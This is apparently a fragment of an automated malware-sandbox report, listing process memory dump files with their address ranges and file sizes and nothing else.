                                                                                  • memory/1832-216-0x0000000002C70000-0x0000000002D30000-memory.dmp
                                                                                    Filesize

                                                                                    768KB

                                                                                  • memory/1832-217-0x0000000000400000-0x0000000002BC5000-memory.dmp
                                                                                    Filesize

                                                                                    39.8MB

                                                                                  • memory/1836-218-0x0000000000410000-0x0000000000424000-memory.dmp
                                                                                    Filesize

                                                                                    80KB

                                                                                  • memory/1844-173-0x0000000000000000-mapping.dmp
                                                                                  • memory/1844-183-0x000007FEFC521000-0x000007FEFC523000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1920-127-0x0000000000130000-0x0000000000221000-memory.dmp
                                                                                    Filesize

                                                                                    964KB

                                                                                  • memory/1920-126-0x0000000000130000-0x0000000000221000-memory.dmp
                                                                                    Filesize

                                                                                    964KB

                                                                                  • memory/1920-131-0x00000000001C259C-mapping.dmp